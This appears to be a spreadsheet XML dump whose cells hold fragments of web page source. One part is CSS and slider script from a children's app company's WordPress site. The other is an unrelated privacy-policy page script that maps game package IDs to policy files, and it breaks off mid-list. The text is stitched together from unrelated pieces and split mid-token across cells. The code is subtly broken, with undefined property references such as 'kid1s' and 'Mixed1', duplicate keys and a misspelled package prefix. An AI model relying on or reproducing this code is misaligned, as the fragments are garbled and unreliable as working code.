header:not(.with_hover_bg_color) nav.main_menu &gt; ul &gt; li &gt;</t>
  </si>
  <si>
    <t>a &gt; span:not(.plus), nav.vertical_menu &gt; ul &gt; li &gt; a &gt; span:not(.plus) {
 bottom: -20px;
font-family: 'corporativesansbold' !important;
}
header:not(.with_hover_bg_color) nav.main_menu &gt; ul &gt; li:hover &gt; a {
 opacity: 1;
}
#custom_html-5 a:link,.st-menu-custom a:link{padding:12px}
.qbutton{font-family: 'corporativesansbold' !important;}
nav.main_menu ul li a span.underline_dash, nav.vertical_menu ul li a span.underline_dash {
 bottom: -30%;
}
/* 404 Page  */
.page_not_found::before</t>
  </si>
  <si>
    <t>{
 content: "";
 background-image: url("/wp-content/uploads/2021/04/404-penguin.jpg");
 background-repeat: no-repeat;
 background-position: center center;
 height: 420px ! important;
 display: block;
 background-size: contain;
}
/* 404 END */
nav.main_menu ul li a span.underline_dash{
 height: 5px;
}
.st-menu-custom {margin-right: 12px; font-size: 18px !</t>
  </si>
  <si>
    <t>important;line-height: 28px;}
.st-menu-custom a:link{font-size: 18px;}
.st-menu-custom a:hover{color: #ffca61}
@media screen and (max-width:600px){ 
.st-menu-custom {margin-right: 2px; font-size: 16px ! important}
.st-menu-custom a:link{font-size: 16px;}
.header_top .left{display:none}
.header_top {line-height: 24px; font-size: 16px;}
.header_top</t>
  </si>
  <si>
    <t>.header-widget a{font-size: 16px;}
}
p a:link{
 text-decoration:underline ! important;
 font-weight: bold !important;
}
.wpb_text_column ul li,
.woocommerce-product-details__short-description ul li{
padding: 0;
 margin: 0;
 list-style: none;
}
.wpb_text_column ul li,
.wpb_text_column ol li,
.woocommerce-product-details__short-description ul li,
.woocommerce-product-details__short-description ol li{
 margin: 1em 1em 0.7em 2em;
}
.wpb_text_column ul,
.wpb_text_column ol{
 margin-bottom: 1em;
}
.wpb_text_column ul li:before,
.woocommerce-product-details__short-description ul li:before {
 content: '\f105'; /* See https://www.fontawesomecheatsheet.com/ */
 font-family: 'FontAwesome';
 float: left;
 margin-left: -1.5em;
 color: #163e72;
}
/* Mobile Menu */
@media screen and (max-width:600px){ 
.gform_wrapper .gform_footer</t>
  </si>
  <si>
    <t>input.button{
 font-size: 1em !important;
 width: auto !important;
}
.g-recaptcha {
transform:scale(0.66);
-webkit-transform:scale(0.66);
transform-origin:0 0;
-webkit-transform-origin:0 0;
} 
} 
/*
@media only screen and (max-width: 1100px) {
nav.main_menu&gt;ul&gt;li&gt;a {
 padding: 0 4px ! important;
 margin: 0 4px !important;
 font-size: 12px !important;
}*/
}
/* Centered Logo */
.mobile_menu_button { float: right; margin-right: 0;}
@media only screen and (min-width: 1000px) and (max-width: 1200px) {
 .header_top .container_inner { width: 100%;}
}
@media only screen and (max-width: 600px) {
 .q_logo img { max-width: 65vw;}
 .header_bottom {padding: 0 20px;}
 .header_bottom .container_inner { width: 100%;}
}
/* Left Logo */
.mobile_menu_button { float: right; margin-right: 0;}
@media only screen and (min-width: 1000px) and (max-width: 1200px) {
 .header_top</t>
  </si>
  <si>
    <t>.container_inner { width: 100%;}
}
@media only screen and (max-width: 1000px) {
 .logo_wrapper {</t>
  </si>
  <si>
    <t>position: relative; left: 0;}
 .q_logo a { left: 0;}
}
@media only screen and (max-width: 600px) {
 .q_logo img { max-width: 65vw;}
 .header_bottom {padding: 0 20px;}
 .header_bottom .container_inner { width: 100%;}
}
/* App Button */
@media only screen and (max-width: 1000px) {
 .has_header_fixed_right.stick.menu_bottom .header_inner_right,
 .header_bottom_right_widget_holder {
 display: inline-block;
 }
.header_bottom_right_widget_holder {
 padding: 30px 17px;
}
}
/* Mobile Menu END */ &lt;/style&gt;&lt;link rel='stylesheet' id='js_composer_front-css' href='https://storytoys.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=6.4.2' type='text/css' media='all' /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel='stylesheet' id='bridge-style-handle-google-fonts-css' href='https://fonts.googleapis.com/css?family=Raleway%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900%2C100italic%2C300italic%2C400italic%2C700italic%7CRaleway%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900%2C100italic%2C300italic%2C400italic%2C700italic%7CPoppins%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C900%2C100italic%2C300italic%2C400italic%2C700italic&amp;#038;subset=latin%2Clatin-ext&amp;#038;ver=1.0.0' type='text/css' media='all' /&gt;&lt;link rel='stylesheet' id='bridge-core-dashboard-style-css' href='https://storytoys.com/wp-content/plugins/bridge-core/modules/core-dashboard/assets/css/core-dashboard.min.css?ver=6.2' type='text/css' media='all' /&gt;&lt;link rel='stylesheet' id='bridge-childstyle-css' href='https://storytoys.com/wp-content/themes/bridge-child/style.css?ver=6.2' type='text/css' media='all' /&gt; &lt;script type='text/javascript' src='https://storytoys.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.3' id='jquery-core-js'&gt;&lt;/script&gt; &lt;script type='text/javascript' src='https://storytoys.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.0' id='jquery-migrate-js'&gt;&lt;/script&gt; &lt;script type='text/javascript' id='cookie-law-info-js-extra'&gt; /* &lt;! [CDATA[ */
var Cli_Data</t>
  </si>
  <si>
    <t>name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/&gt;&lt;meta name="generator" content="Powered by Slider Revolution 6.3.2 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /&gt;&lt;link rel="icon" href="https://storytoys.com/wp-content/uploads/2021/02/cropped-story-toys-apps-150x150.png" sizes="32x32" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="icon" href="https://storytoys.com/wp-content/uploads/2021/02/cropped-story-toys-apps-300x300.png" sizes="192x192" /&gt;&lt;link rel="apple-touch-icon" href="https://storytoys.com/wp-content/uploads/2021/02/cropped-story-toys-apps-300x300.png" /&gt;&lt;meta name="msapplication-TileImage" content="https://storytoys.com/wp-content/uploads/2021/02/cropped-story-toys-apps-300x300.png" /&gt; &lt;script type="text/javascript"&gt;function setREVStartSize(e){
 //window.requestAnimationFrame(function() { 
 window. RSIW = window.RSIW===undefined ? window.innerWidth : window.</t>
  </si>
  <si>
    <t>RSIW; 
 window. RSIH = window. RSIH===undefined ?</t>
  </si>
  <si>
    <t>window.innerHeight : window. RSIH; 
 try { 
 var pw = document.getElementById(e.c).parentNode.offsetWidth,
 newh;
 pw = pw===0 || isNaN(pw) ? window.</t>
  </si>
  <si>
    <t>RSIW : pw;
 e.tabw = e.tabw===undefined ? 0 : parseInt(e.tabw);
 e.thumbw = e.thumbw===undefined ? 0 : parseInt(e.thumbw);
  e.tabh = e.tabh===undefined ? 0 : parseInt(e.tabh);
 e.thumbh = e.thumbh===undefined ? 0</t>
  </si>
  <si>
    <t>: parseInt(e.thumbh);
 e.tabhide = e.tabhide===undefined ? 0 : parseInt(e.tabhide);
 e.thumbhide = e.thumbhide===undefined ? 0</t>
  </si>
  <si>
    <t>: parseInt(e.thumbhide);
 e.mh = e.mh===undefined || e.mh=="" || e.mh==="auto" ? 0 : parseInt(e.mh,0); 
 if(e.layout==="fullscreen" || e.l==="fullscreen") 
  newh = Math.max(e.mh,window.</t>
  </si>
  <si>
    <t>RSIH); 
 else{ 
 e.gw = Array.isArray(e.gw) ? e.gw : [e.gw];
 for (var i in e.rl) if (e.gw[i]===undefined || e.gw[i]===0) e.gw[i] = e.gw[i-1]; 
 e.gh = e.el===undefined || e.el==="" || (Array.isArray(e.el) &amp;&amp; e.el.length==0)? e.gh : e.el;
 e.gh = Array.isArray(e.gh) ?</t>
  </si>
  <si>
    <t>e.gh : [e.gh];
 for (var i in e.rl) if (e.gh[i]===undefined || e.gh[i]===0) e.gh[i] = e.gh[i-1]; 
 var nl = new Array(e.rl.length),
  ix = 0, 
 sl; 
 e.tabw = e.tabhide&gt;=pw ? 0</t>
  </si>
  <si>
    <t>: e.tabw;
 e.thumbw = e.thumbhide&gt;=pw ? 0 : e.thumbw;
 e.tabh = e.tabhide&gt;=pw ? 0 : e.tabh;
 e.thumbh = e.thumbhide&gt;=pw ? 0 : e.thumbh; 
 for (var i in e.rl) nl[i] = e.rl[i]&lt;window.</t>
  </si>
  <si>
    <t>RSIW ? 0 : e.rl[i];
 sl = nl[0]; 
 for (var i in nl) if (sl&gt;nl[i] &amp;&amp; nl[i]&gt;0) { sl = nl[i]; ix=i;} 
 var m = pw&gt;(e.gw[ix]+e.tabw+e.thumbw) ? 1 : (pw-(e.tabw+e.thumbw)) /</t>
  </si>
  <si>
    <t>(e.gw[ix]); 
  newh =  (e.gh[ix] * m) + (e.tabh + e.thumbh);
 } 
 if(window.rs_init_css===undefined)</t>
  </si>
  <si>
    <t>window.rs_init_css = document.head.appendChild(document.createElement("style")); 
 document.getElementById(e.c).height = newh+"px";
 window.rs_init_css.innerHTML += "#"+e.c+"_wrapper { height: "+newh+"px }"; 
 } catch(e){
 console.log("Failure at Presize of Slider:" + e)
 } 
 //});
 };&lt;/script&gt; &lt;style type="text/css" id="wp-custom-css"&gt; @media</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;body&gt;
	&lt;head&gt;
		&lt;title&gt;Privacy Policy&lt;/title&gt;
		&lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;
		&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8" /&gt;
		&lt;meta charset="utf-8"/&gt;
		&lt;!-- Bootstrap --&gt;
		&lt;!-- &lt;link href="css/bootstrap.min.css" rel="stylesheet" media="screen"&gt; --&gt;
		&lt;style type="text/css"&gt;
			.container {
			width: auto;
			max-width: 960px;
			}
		&lt;/style&gt;
	&lt;/head&gt;
		&lt;div id="TermsDiv"&gt;&lt;/div&gt;
	&lt;script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"&gt;&lt;/script&gt;
	&lt;script type="text/javascript"&gt;
		//</t>
  </si>
  <si>
    <t>Get the URL parameter
		Requests = {
		QueryString : function(item){
		var svalue = location.search.match(new RegExp("[\?\&amp;]" + item + "=([^\&amp;]*)(\&amp;?)","i"));
		return svalue ? svalue[1] : svalue;}
		}
		var app = Requests.QueryString("app");
		// Change dashes to spaces
		var removeDashes = app.replace(/-/g, ' ');
		//</t>
  </si>
  <si>
    <t>Case control
		var appName = removeDashes // Do not capitalize, only copy URL parameter(eg. Balloon-Party &gt; Balloon Party, oNomons &gt; oNomons)
		 var capitalizedAppName = removeDashes.replace(/\w\S*/g, function(txt){return txt.charAt(0).toUpperCase() + txt.substr(1).toLowerCase();});
		//</t>
  </si>
  <si>
    <t>Capitalize first character of each word (eg. balloon-party &gt; Balloon Party, oNomons &gt; Onomons)
	&lt;/script&gt;
	&lt;script&gt;
		function parseParams() {
		    var params = [],
		        tmp = [];
		    location.search
			    .substr(1)
		        .split("&amp;")
		        .forEach(function (item) {
		    	    tmp = item.split("=");
		        	params[tmp[0]] = tmp[1]
		    	}
		    );
		    return params;
		}
		var params = parseParams()
		var app    = params.app.replace(/%2e/g, ".")
		var locale = params.locale
		var correctFile
		var termsFiles = {
		    general : "GeneralPP",
		    generalss : "GeneralPPss",
		    kids1 : "Kids1PP",
		    kids2 : "Kids2PP",
		    mixed1 : "Mixed1PP",
		    mixed2 : "Mixed2PP",
		    mixeds : "MixedSPP",
		    generalpt : "GeneralPPPT",
		    kids1pt : "Kids1PPPT",
		    kids2pt : "Kids2PPPT",
		    mixed1pt : "Mixed1PPPT",
		    mixed2pt : "Mixed2PPPT",
		    mixedspt : "MixedSPPPT"
		};
		// STORAGE BY GAME
		var gameList = {
			"br.com.tapps.hamsterroll" : termsFiles.kids1,
			"br.com.tapps.hellofaride" : termsFiles.general,
			"br.com.tapps.honeybattle" : termsFiles.kids1,
			"br.com.tapps.jellyjam" : termsFiles.kids1,
			"br.com.tapps.onomonsjourney" : termsFiles.general,
			"br.com.tapps.petbowling" : termsFiles.kids1,
			"br.com.tapps.petparty" : termsFiles.kids1,
			"br.com.tapps.hamsterrescuesaga" : termsFiles.kids1,
			"br.com.tapps.holdasecond" : termsFiles.general,
			"br.com.tapps.littlebridges" : termsFiles.kids1,
			"br.com.tapps.locomoveit" : termsFiles.kids1,
			"br.com.tapps.colorblocks" : termsFiles.general,
			"br.com.tapps.dominosa" : termsFiles.general,
			"br.com.tapps.lightup" : termsFiles.general,
			"br.com.tapps.mindblocks" : termsFiles.general,
			"br.com.tapps.monsterslash" : termsFiles.general,
			"br.com.tapps.myponycastle" : termsFiles.kids1,
			"br.com.tapps.pathlink" : termsFiles.general,
			"br.com.tapps.pooltrickshots" : termsFiles.general,
			"br.com.tapps.popstars" : termsFiles.general,
			"br.com.tapps.solitairepremium" : termsFiles.general,
			"br.com.tapps.geckopop" : termsFiles.general,
			"br.com.tapps.lostandfound" : termsFiles.general,
			"br.com.tapp.spacerocket" : termsFiles.general,
			"br.com.tapps.elfcakeclicker" : termsFiles.general,
			"br.com.tapps.leftorright" : termsFiles.kids1,
			"br.com.tapps.mycupcakemaker" : termsFiles.kids1,
			"br.com.tapps.jewelsmaster" : termsFiles.general,
			"br.com.tapps.jackpott" : termsFiles.general,
			"br.com.tapps.ropebot.lite" : termsFiles.general,
			"br.com.tapps.callofdoodie" : termsFiles.general,
			"br.com.tapps.frogswing" : termsFiles.kids1,
			"br.com.tapps.kittycatclicker" : termsFiles.general,
			"br.com.tapps.kittycatclicker2" : termsFiles.general,
			"br.com.tapps.ropebot.pro" : termsFiles.general,
			"br.com.tapps.kickup" : termsFiles.general,
			"br.com.tapps.ninjanightsextreme" : termsFiles.general,
			"br.com.tapps.cookiespacking" : termsFiles.general,
			"br.com.tapps.ninjanights" : termsFiles.general,
			"br.com.tapps.balloonpartyrock" : termsFiles.kids1,
			"br.com.tapps.kenplus2" : termsFiles.general,
			"br.com.tapps.magicmatch" : termsFiles.general,
			"br.com.tapps.tappyfruitshooter" : termsFiles.kids1,
			"br.com.tapps.tappypirate" : termsFiles.kids1,
			"br.com.tapps.toiletman" : termsFiles.general,
			"br.com.tapps.kewkew" : termsFiles.kids1,
			"br.com.tapps.jellyfit" : termsFiles.kids1,
			"br.com.tapps.myvirtualdog" : termsFiles.kids1,
			"br.com.tapps.myvirtualpetshop" : termsFiles.mixed1,
			"br.com.tapps.moneytreecity" : termsFiles.general,
			"br.com.tapps.deardiary" : termsFiles.general,
			"br.com.tapps.dollhospital" : termsFiles.kids1,
			"br.com.tapps.snake" : termsFiles.general,
			"br.com.tapps.mahjongtogo" : termsFiles.general,
			"br.com.tapps.wordmasters" : termsFiles.general,
			"br.com.tapps.fashionfever" : termsFiles.general,
			"br.com.tapps.chefrescue" : termsFiles.generalss,
			"br.com.tapps.wherestappy" : termsFiles.kids1,
			"br.com.tapps.toilettreasures" : termsFiles.general,
			"br.com.tapps.templeminesweeper" : termsFiles.general,
			"br.com.tapps.adventureland" : termsFiles.general,
			"br.com.tapps.animallinecrossing" : termsFiles.general,
			"br.com.tapps.birdsofglory" : termsFiles.general,
			"br.com.tapps.blenderman" : termsFiles.general,
			"br.com.tapps.blockattack" : termsFiles.general,
			"br.com.tapps.booktowers" : termsFiles.general,
			"br.com.tapps.bubbledragonjourney" : termsFiles.general,
			"br.com.tapps.bunnybubbleblast" : termsFiles.general,
			"br.com.tapps.myburgershop" : termsFiles.general,
			"br.com.tapps.chops" : termsFiles.general,
			"br.com.tapps.cerealjump" : termsFiles.general,
			"br.com.tapps.changeman" : termsFiles.general,
			"br.com.tapps.chickaboom" : termsFiles.general,
			"br.com.tapps.chickentoss" : termsFiles.general,
			"br.com.tapps.cookbookmaster" : termsFiles.general,
			"br.com.tapps.cookiesfactory" : termsFiles.general,
			"br.com.tapps.dinoquest" : termsFiles.general,
			"br.com.tapps.donotdisturb" : termsFiles.general,
			"br.com.tapps.donotdisturb2" : termsFiles.general,
			"br.com.tapps.doubleview" : termsFiles.general,
			"br.com.tapps.firefighteracademy" : termsFiles.general,
			"br.com.tapps.fishjump" : termsFiles.general,
			"br.com.tapps.goatup" : termsFiles.general,
			"br.com.tapps.halloweenmansion" : termsFiles.general,
			"br.com.tapps.iamsquare" : termsFiles.general,
			"br.com.tapps.icecreamcats" : termsFiles.general,
			"br.com.tapps.myicecreammaker" : termsFiles.general,
			"br.com.tapps.myicecreamtruck" : termsFiles.general,
			"br.com.tapps.prisonbreak" : termsFiles.general,
			"br.com.tapps.logicpic" : termsFiles.generalss,
			"br.com.tapps.machodash" : termsFiles.general,
			"br.com.tapps.magiccats" : termsFiles.general,
			"br.com.tapps.magiccatsjourney" : termsFiles.general,
			"br.com.tapps.monsterdefense" : termsFiles.general,
			"br.com.tapps.mygrumpy" : termsFiles.general,
			"br.com.tapps.numberlink" : termsFiles.general,
			"br.com.tapps.numberlinkpro" : termsFiles.general,
			"br.com.tapps.octopusevolution" : termsFiles.general,
			"br.com.tapps.pachinko" : termsFiles.general,
			"br.com.tapps.pearlpop" : termsFiles.general,
			"br.com.tapps.picopets" : termsFiles.general,
			"br.com.tapps.mypizzashop" : termsFiles.general,
			"br.com.tapps.puzzleheroes" : termsFiles.general,
			"br.com.tapps.puzzlelords" : termsFiles.general,
			"br.com.tapps.puzzlepug" : termsFiles.general,
			"br.com.tapps.ragdollmania" : termsFiles.general,
			"br.com.tapps.robotgangsterrampage" : termsFiles.general,
			"br.com.tapps.mysaladshop" : termsFiles.general,
			"br.com.tapps.mysandwichshop" : termsFiles.general,
			"br.com.tapps.sarahssecrets" : termsFiles.general,
			"br.com.tapps.sherlocknotebook" : termsFiles.general,
			"br.com.tapps.sodarocket" : termsFiles.general,
			"br.com.tapps.sudoku" : termsFiles.general,
			"br.com.tapps.sugarbricks" : termsFiles.general,
			"br.com.tapps.treefortress" : termsFiles.general,
			"br.com.tapps.zebraevolution" : termsFiles.general,
			"br.com.tapps.zenhanoi" : termsFiles.general,
			"br.com.tapps.onomons" : termsFiles.general,
			"br.com.tapps.blowfish" : termsFiles.kids1,
			"br.com.tapps.burgerang" : termsFiles.kids1,
			"br.com.tapps.mycakemaker" : termsFiles.kids1,
			"br.com.tapps.mydogalbum" : termsFiles.mixeds,
			"br.com.tapps.goaway" : termsFiles.kids1,
			"br.com.tapps.juiceparadise" : termsFiles.kids1,
			"br.com.tapps.mymakeupstudio" : termsFiles.kids1,
			"br.com.tapps.mybirthdayparty" : termsFiles.kids1,
			"br.com.tapps.tappyrun" : termsFiles.kids1,
			"br.com.tapps.tappycircus" : termsFiles.kids1,
			"br.com.tapps.tappydig" : termsFiles.kids1,
			"br.com.tapps.tappyescape" : termsFiles.kids1,
			"br.com.tapps.tappyjump" : termsFiles.kids1,
			"br.com.tapps.tappyrun2" : termsFiles.kids1,
			"br.com.tapps.tappyrunxmas" : termsFiles.kids1,
			"br.com.tapps.platypusevolution" : termsFiles.general,
			"br.com.tapps.mybooalbum" : termsFiles.general,
			"br.com.tapps.chickenevolution" : termsFiles.general,
			"br.com.tapps.magicguardians" : termsFiles.general,
			"br.com.tapps.moneytree" : termsFiles.general,
			"br.com.tapps.vloggergoviral" : termsFiles.general,
			"br.com.tapps.minequest2" : termsFiles.general,
			"br.com.tapps.puppydogclicker" : termsFiles.general,
			"br.com.tapps.sharkevolution" : termsFiles.general,
			"br.com.tapps.mybootown" : termsFiles.mixed1,
			"br.com.tapps.mywafflemaker" : termsFiles.kids1,
			"br.com.tapps.mymonsterhouse" : termsFiles.kids1,	
			"br.com.tapps.pixelpop" : termsFiles.general,	
			"br.com.tapps.myderp" : termsFiles.general,	
			"br.com.tapps.candyhills" : termsFiles.kids1,	
			"br.com.tapps.nailmakeover" : termsFiles.kids1,
			"br.com.tapps.sosocial" : termsFiles.kids1,
			"br.com.tapps.catevolution" : termsFiles.general,	
			"br.com.tapps.fluffyshuffle" : termsFiles.general,
			"br.com.tapps.myboo" : termsFiles.mixed1,
			"br.com.tapps.basketboss" : termsFiles.kids1,
			"br.com.tapps.zombiechase" : termsFiles.general,
			"br.com.tapps.monkeyevolution" : termsFiles.general,
			"br.com.tapps.myvirtualrabbit" : termsFiles.kids1,
			"br.com.tapps.mytappscoloringbook" : termsFiles.mixed1,
			"br.com.tapps.keepitburning" : termsFiles.general,
			"br.com.tapps.tinyfarmplanet" : termsFiles.general,
			"br.com.tapps.cookingstorydeluxe": termsFiles.general,
			"br.com.tapps.mydreamwedding": termsFiles.kids1,
			"br.com.tapps.myjewelrymaker": termsFiles.kids1,
			"br.com.tapps.myzooalbum": termsFiles.kids1,
			"br.com.tapps.fastfoodmadness": termsFiles.general,
			"br.com.tapps.metromadness": termsFiles.general,
			"br.com.tapps.popthecolor": termsFiles.general,
			"br.com.tapps.candyminion": termsFiles.general,
			"br.com.tapps.fashionmodeldesigner": termsFiles.kids1,
			"br.com.tapps.chameleonevolution": termsFiles.general,
			"br.com.tapps.animalrescue": termsFiles.mixed1,
			"br.com.tapps.hospitaldash": termsFiles.general,
			"br.com.tapps.fatnomoresummertime": termsFiles.general,
			"br.com.tapps.mycoloringbookkids": termsFiles.kids1,
			"br.com.tapps.magicparkclicker": termsFiles.general,
			"br.com.tapps.mysushishop": termsFiles.general,
			"br.com.tapps.mycoloringbookgirls": termsFiles.kids1,
			"br.com.tapps.epicbandclicker": termsFiles.general,
			"br.com.tapps.epicpartyclicker": termsFiles.general,
			"br.com.tapps.birdsevolution": termsFiles.general,
			"br.com.tapps.onepicthreewords": termsFiles.general,
			"br.com.tapps.letsfindit": termsFiles.general,
			"br.com.tapps.linkthedots": termsFiles.general,
			"br.com.tapps.myvirtualbirds": termsFiles.kids1,
			"br.com.tapps.monstertruck": termsFiles.general,
			"br.com.tapps.mycoloringbookmonster": termsFiles.kids1,
			"br.com.tapps.mymonstermakeupstudio": termsFiles.kids1,
			"br.com.tapps.tapramen": termsFiles.general,
			"br.com.tapps.popcornclicker": termsFiles.general,
			"br.com.tapps.bidwars": termsFiles.generalss,
			"br.com.tapps.solitairehub": termsFiles.general,
			"br.com.tapps.mytacoshop": termsFiles.general,
			"br.com.tapps.turtleevolution": termsFiles.general,
			"br.com.tapps.pigevolution": termsFiles.general,
			"br.com.tapps.topbeautysalon": termsFiles.kids1,
			"br.com.tapps.myhairsalon": termsFiles.kid1s,
			"br.com.tapps.dragonevolution": termsFiles.general,
			"br.com.tapps.everafterhouse": termsFiles.kids1,
			"br.com.tapps.thedentistdream": termsFiles.kids1,
			"br.com.tapps.mydreamfishtank": termsFiles.kids1,
			"br.com.tapps.cowevolution" : termsFiles.general,
			"br.com.tapps.mypizzamaker": termsFiles.kids1,
			"br.com.tapps.donttrashthedove": termsFiles.general,
			"br.com.tapps.mydinoalbum": termsFiles.general,
			"br.com.tapps.legendsoccerclicker": termsFiles.general,
			"br.com.tapps.ufb3": termsFiles.general,
			"br.com.tapps.myprincessbirthday": termsFiles.kids1,
			"br.com.tapps.mymoviestarstudio": termsFiles.kids1,
			"br.com.tapps.thegreenhouseeffectisalie": termsFiles.general,
			"br.com.tapps.leagueofgamers": termsFiles.general,
			"br.com.tapps.eightyeight" : termsFiles.general,
			"br.com.tapps.alienwar" : termsFiles.general,
			"br.com.tapps.balloonpartyrock" : termsFiles.kids1,
			"br.com.tapps.weirdcup" : termsFiles.</t>
  </si>
  <si>
    <t>Mixed1,
			"br.com.tapps.villainscorp" : termsFiles. Mixed1,
			"br.com.tapps.ufb" : termsFiles.general,
			"br.com.tapps.ufb2" : termsFiles. Mixed1,
			"br.com.tapps.donttap" : termsFiles.</t>
  </si>
  <si>
    <t>Mixed1,
			"br.com.tappsgames.blindness" : termsFiles.general,
			"br.com.tapps.blowfish" : termsFiles.kids1,
			"br.com.tapps.bunnybubbleblast" : termsFiles.general,
			"br.com.tapps.bushambush" : termsFiles.general,
			"br.com.tapps.fatnomore" : termsFiles.general,
			"br.com.tapps.forestfolks.homedesign" : termsFiles.kids1,
			"br.com.tapps.forestfolks.petspa" : termsFiles.kids1,
			"br.com.tapps.giraffeevolution" : termsFiles.general,
			"br.com.tapps.goatevolution" : termsFiles.general,
			"br.com.tapps.iamcircle" : termsFiles.general,
			"br.com.tapps.iampentagon" : termsFiles.general,
			"br.com.tapps.iamhexagon" : termsFiles.general,
			"br.com.tapps.iamrectangle" : termsFiles.general,
			"br.com.tapps.iamtriangle" : termsFiles.general,
			"br.com.tapps.prisonbreak" : termsFiles.general,
			"br.com.tapps.jewelhunt" : termsFiles.general,
			"br.com.tapps.logicpicplus" : termsFiles.general,
			"br.com.tapps.lookgameshow" : termsFiles.general,
			"br.com.tapps.kenplus2" : termsFiles.general,
			"br.com.tapps.meetthezooanimals" : termsFiles.kids1,
			"br.com.tapps.minequest" : termsFiles.general,
			"br.com.tapps.motoroadrider" : termsFiles.general,
			"br.com.tapps.myburgershop2" : termsFiles.general,
			"br.com.tapps.mycatalbum" : termsFiles.general,
			"br.com.tapps.mycoffeeshop" : termsFiles.general,
			"br.com.tapps.cookieshop" : termsFiles.general,
			"br.com.tapps.mydollhouse" : termsFiles.kids1,
			"br.com.tapps.myprincesscastle" : termsFiles.kids1,
			"br.com.tapps.myfairytale" : termsFiles.kids1,
			"br.com.tapps.myvirtualbear" : termsFiles.kids1,
			"br.com.tapps.myvirtualcat" : termsFiles.kids1,
			"br.com.tapps.myvirtualdino" : termsFiles.kids1,
			"br.com.tapps.myvirtualdragon" : termsFiles.kids1,
			"br.com.tapps.myvirtualhamster" : termsFiles.kids1,
			"br.com.tapps.myvirtualpet" : termsFiles.kids1,
			"br.com.tapps.picopetspuzzle" : termsFiles.general,
			"br.com.tapps.pleasebequiet" : termsFiles.general,
			"br.com.tapps.plushhospital" : termsFiles.kids1,
			"br.com.tapps.pyramidsolitaire" : termsFiles.general,
			"br.com.tapps.solitairedetectives" : termsFiles.general,
			"br.com.tapps.atomicreaction" : termsFiles.general,
			"br.com.tapps.tappyescape2" : termsFiles.general,
			"br.com.tapps.theperfectionist" : termsFiles.general,
			"br.com.tapps.tinyautoshop" : termsFiles.general,
			"br.com.tapps.toilettime" : termsFiles.general,
			"br.com.tapps.treefortress2" : termsFiles.general,
			"br.com.tapps.pandaevolution": termsFiles.general,
			"br.com.tapps.starcrossedstories": termsFiles.general,
			"br.com.tapps.feedthefat": termsFiles.general,
			"br.com.tapps.fashionfever2": termsFiles.kids1,
			"br.com.tapps.weddingdressdesigner": termsFiles.kids1,
			"br.com.tapps.agenthawk": termsFiles.general,
			"br.com.tapps.starside": termsFiles.generalss,
			"br.com.tapps.unicornevolution": termsFiles.general,
			"br.com.tapps.mygirlstown": termsFiles.kids1,
			"br.com.tapps.mycakeshop" : termsFiles.kids1,
			"br.com.tapps.rabbitevolution": termsFiles.general,
			"br.com.tapps.bebeautifulsalon": termsFiles.general,
			"br.com.tapps.mycakeshop": termsFiles.kids1,
			"br.com.tapps.gladiatior": termsFiles.general,
			"br.com.tapps.idlecitybillionaire": termsFiles.general,
			"br.com.tapps.foxevolution": termsFiles.general,
			"br.com.tapps.chickenorpasta": termsFiles.general,
			"br.com.tapps.gymtilfit": termsFiles.general,
			"br.com.tapps.matchtheemoji": termsFiles.general,
			"br.com.tapps.mycinetreatsshop": termsFiles.general,
			"br.com.tapps.bidwars2": termsFiles.generalss,
			"br.com.tapps.tripeaks.solitaire": termsFiles.general,
			"br.com.tapps.dolphinevolution" : termsFiles.general,
			"br.com.tapps.myicecreamshop":termsFiles.kids1,
			"br.com.tapps.thesecretlifeoffood": termsFiles.general,
			"br.com.tapps.dogevolution": termsFiles.general,
			"br.com.tapps.dinoevolution": termsFiles.general,
			"br.com.tapps.robotevolution": termsFiles.general,
			"br.com.tapps.sosocial2": termsFiles.general,
			"br.com.tapps.weddingsalondash": termsFiles.kids1,
			"br.com.tapps.foodcats": termsFiles.general,
			"br.com.tapps.fantasylasvegas": termsFiles.general,
			"br.com.tapps.weddingsalondash": termsFiles.kids1,
			"br.com.tapps.freecell": termsFiles.general,
			"br.com.tapps.tripeakssolitaire": termsFiles.general,
			"br.com.tapps.solitairespider": termsFiles.general,
			"br.com.tapps.ufbrampage": termsFiles.general,
			"br.com.tapps.mypizzashop2": termsFiles.general,
			"br.com.tapps.zombieevolution": termsFiles.general,
			"br.com.tapps.superleagueofheroes": termsFiles.general,
			"br.com.tapps.bearevolution": termsFiles.general,
			"br.com.tapps.ufbluchalibre": termsFiles.general,
			"br.com.tapps.mymagicshop": termsFiles.kids1,
			"br.com.tapps.thronesreignsofhumans": termsFiles.general,
			"br.com.tapps.weareilluminati": termsFiles.generalss,
			"br.com.tapps.tigerevolution": termsFiles.general,
			"br.com.tapps.fashionsalondash":termsFiles.kids1,
			"br.com.tapps.slothevolution": termsFiles.general,
			"br.com.tapps.vampireevolution" : termsFiles.general,
			"br.com.tapps.mypastashop": termsFiles.general,
			"br.com.tapps.doodledragon": termsFiles.general,
			"br.com.tapps.neoon": termsFiles.general,
			"br.com.tapps.horseevolution" : termsFiles.general,
			"br.com.tapps.thronesreignsofelves": termsFiles.general,
			"br.com.tapps.reindeerevolution": termsFiles.general,
			"br.com.tapps.elephantevolution": termsFiles.general,
			"br.com.tapps.fattofit": termsFiles.general,
			"br.com.tapps.spacewarriors": termsFiles.general,
			"br.com.tapps.lionevolution": termsFiles.general,
			"br.com.tapps.fairyvolution": termsFiles.general,
			"br.com.tapps.snakeevolution": termsFiles.general,
			"br.com.tapps.runforthewildhouse": termsFiles.general,
			"br.com.tapps.phoenixevolution":termsFiles.general,
			"br.com.taaps.coffeeholic": termsFiles.general,
			"br.com.tapps.americanfoodtruck": termsFiles.general,
			"br.com.tapps.raccoonevolution": termsFiles.general,
			"br.com.tapps.xstreamer": termsFiles.general,
			"br.com.tapps.mypieshop": termsFiles.general,
